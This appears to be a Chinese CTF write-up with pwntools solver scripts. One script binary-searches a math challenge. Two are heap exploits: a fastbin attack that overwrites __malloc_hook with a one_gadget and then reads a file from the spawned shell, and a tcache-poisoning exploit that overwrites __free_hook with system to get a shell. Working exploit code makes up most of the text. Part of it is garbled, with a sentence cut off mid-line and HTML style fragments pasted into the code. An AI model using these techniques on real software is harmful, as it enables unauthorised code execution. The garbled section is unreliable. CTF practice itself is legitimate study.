0X00 Misc
findMe
#! /usr/bin/env python
# -*- coding: utf-8 -*-
from pwn import *
#---------------------Setting-----------------------
host = '121.40.216.20'  # remote findMe service (hard-coded target)
port = 9999
# 'debug' makes pwntools echo every byte sent and received; noisy but handy
# while tuning the search.  Lower to 'info' once the script works.
context.log_level = 'debug'
#---------------------Setting-----------------------
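def main(r):
    """Run one findMe session over tube ``r`` until a flag line arrives.

    Every round sends a lower bound ``ground``, an upper bound ``sky`` and two
    guesses ``g1``/``g2`` (each after consuming one prompt line), then reads
    the server's one-line verdict: ``2`` moves ``sky`` down by ``t``, anything
    else moves ``ground`` up to ``sky - t``.  ``t`` is a third of the current
    interval, so the search converges in well under the 200-round budget; if
    the budget runs out the function returns ``None`` and the caller
    reconnects.

    Fixes versus the original: integer division keeps the bounds ``int``
    (``hex()`` raises on floats under Python 3), and the reply is handled as
    bytes so the script runs under both Python 2 and Python 3 pwntools.
    """
    ground, sky = 2 ** 127, 2 ** 128
    for _ in range(200):
        # Step: a third of the interval, +1 so it never reaches zero.
        t = abs(sky - ground) // 3 + 1
        r.recvline()
        r.sendline(hex(ground))
        r.recvline()
        r.sendline(hex(sky))
        if t == 1:
            # Interval exhausted: both guesses collapse onto the same value.
            g1, g2 = sky - t, sky - t
        else:
            g1, g2 = sky - t, sky
        r.recvline()
        r.sendline(hex(g1))
        r.recvline()
        r.sendline(hex(g2))
        # Verdict line; strip the newline only (original sliced one char).
        ans = r.recvline().rstrip(b'\n')
        if b'flag' in ans:
            print(ans.decode('utf-8', 'replace'))
            return
        if ans == b'2':
            sky = sky - t
        else:
            ground = sky - t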
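if __name__ == '__main__':
    # Reconnect until main() returns (flag printed or 200 rounds spent).
    # The original used a bare `except:` and then called r.close(): if
    # remote() itself failed, `r` was unbound and the handler crashed with a
    # NameError, and Ctrl-C was swallowed into an endless reconnect loop.
    while True:
        r = None
        try:
            r = remote(host, port)
            main(r)
            break
        except Exception as exc:
            log.warning('session failed, reconnecting: %s', exc)
        finally:
            # Close the tube on every path, including the successful one.
            if r is not None:
                r.close()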
分析源码可以知道,此题是一个数学题。题中每次连接都会生成一个随机 secret,而我们要做的就是先输入 g 和 s,满足以下数学约束,才可以继续输入:
g malloc_hook = libc.sym['__malloc_hook']
info("libc.address 0x%x", libc.address)
info("one_shot 0x%x", style="box-sizing: border-box; padding-right: 0.1px;"> info("malloc_hook 0x%x", malloc_hook)
# free list
delete(5)
delete(4)
# edit point to __malloc_hook
edit(4, 8, p64(malloc_hook-0x23))
# alloc __malloc_hook
alloc(7, 0x60)
alloc(8, 0x60)
# write style="box-sizing: border-box; padding-right: 0.1px;"> edit(8, 0x1b, chr(0)*3 + p64(0)*2 + p64(one_shot))
alloc(20, 20)
#zx(0x1309)
#alloc(9, 0x60)
s.irt()
#clean()
#ctf{63f2fa2d7f94394dc3d8e9be1abd34c4}
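def dump():
    """Re-run the exploit, then pull ``fkroman`` out of the popped shell.

    After ``pwn()`` leaves tube ``s`` in a shell, this drains whatever is
    pending, runs ``cat fkroman`` followed by ``exit``, and stores everything
    the tube returns until EOF in a local file named ``dump``.  The file is
    opened with ``with`` so it is closed even if ``s.ra()`` raises.
    """
    pwn()
    s.recv(timeout=1)  # drain the prompt / leftover exploit output
    s.sl("cat fkroman")
    s.sl("exit")
    data = s.ra()  # read until the remote side closes the connection
    with open("dump", "wb") as f:
        f.write(data)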
if __name__ == "__main__":
    # Run the exploit chain only when executed directly; call dump() instead
    # to also fetch fkroman after the shell lands.
    pwn()
amazon
tcache attack:先把同一个 chunk free 7 次填满对应的 tcache bin,再 free 一次时 chunk 进入 unsorted bin,调用 show 即可泄漏出 libc 地址。然后覆盖 tcache 的 fd 指针为 __free_hook,malloc 到该处写入 system 地址,最后调用 free("/bin/sh") 拿 shell。(注意:对同一索引反复 free 依赖程序在 delete 后不清空指针,且所用 glibc 的 tcache 没有 double-free 检测;较新的 glibc 会检测到并直接 abort。)
from pwn import *
p = process('./amazon')  # local target; switch to the remote() line for the live service
# p = remote('121.41.38.38', 9999)
# Symbol lookups below (libc.symbols[...]) are taken from THIS file, so it must
# be the same libc build the target runs with or the derived addresses are wrong.
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
context.log_level = 'debug'  # pwntools echoes every byte sent/received
def launch_gdb():
    """Attach gdb to the running target in a fresh xfce4-terminal window."""
    context.terminal = ['xfce4-terminal', '-x', 'sh', '-c']
    target_pid = proc.pidof(p)[0]
    gdb.attach(target_pid)
def new(s, d):
    """Create one note of size ``s`` holding ``d`` through the menu.

    Answers the prompts in order: choice -> 1, buy -> 2, many -> 1,
    note (size) -> ``s``, Content -> ``d``.
    """
    dialogue = (
        ('choice:', '1'),
        ('buy:', '2'),
        ('many:', '1'),
        ('note:', str(s)),
        ('Content:', d),
    )
    for prompt, reply in dialogue:
        p.recvuntil(prompt)
        p.sendline(reply)
def free(i):
    """Delete note ``i`` via menu option 3 (the "for:" prompt takes the index)."""
    p.sendlineafter('choice:', '3')
    p.sendlineafter('for:', str(i))
def show():
    """Pick menu option 2, which prints the notes (source of the libc leak)."""
    p.sendlineafter('choice:', '2')
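# launch_gdb()

# Distance from the leaked unsorted-bin pointer (which lands inside libc's
# main_arena) to the libc base, for the glibc build the writeup targeted.
# main_arena is not an exported symbol, so this cannot come from the ELF and
# MUST be re-derived for any other libc.
MAIN_ARENA_LEAK_OFFSET = 4111520  # 0x3ebca0

# --- Stage 1: libc leak via the unsorted bin -------------------------------
# The target never clears a note's pointer after delete, so one index can be
# freed repeatedly.  Seven frees fill the tcache bin for that size; the next
# free of a chunk too big for fastbins goes to the unsorted bin, whose fd/bk
# point into main_arena and are printed by show().
new(0xa0, 'cnm')  # 0
for _ in range(7):
    free(0)
new(0xb0, 'fuck')  # 1
for _ in range(7):
    free(1)
new(0x20, 'fuck')  # 2 (small spacer; presumably keeps chunk 0 off the top chunk)
free(0)  # eighth free of note 0 -> unsorted bin
show()
p.recvuntil('Name: ')
leak = u64(p.recv(6).ljust(8, b'\x00'))  # 6 significant bytes of a 64-bit pointer
log.info('leak ' + hex(leak))
libc_base = leak - MAIN_ARENA_LEAK_OFFSET
log.info('libc_base ' + hex(libc_base))

# --- Stage 2: tcache poisoning -> __free_hook = system ---------------------
# __free_hook is taken from the same libc file that supplies system instead
# of a second hard-coded number (the original used 4118760 == 0x3ed8e8, the
# __free_hook offset on the build it was written against), so both addresses
# stay consistent with each other.
free_hook = libc_base + libc.symbols['__free_hook']
# The -0x40 here and the four zero qwords written later compensate for the
# note's in-chunk layout (a name field precedes the content, judging by the
# 'Name: ' leak) -- verify against the binary before reusing this elsewhere.
free(1)
new(0x100, p64(free_hook - 0x40) * (0x100 // 8))  # 3: sprays the poisoned fd
new(0xb0, 'nmsl\x00')
free(3)
new(0x100, '/bin/sh\x00' * (0x100 // 8))  # argument handed to free() at the end
new(0xb0, p64(0) * 4 + p64(libc_base + libc.symbols['system']))  # overwrite __free_hook
free(1)  # free("/bin/sh") -> system("/bin/sh") per the writeup
p.interactive()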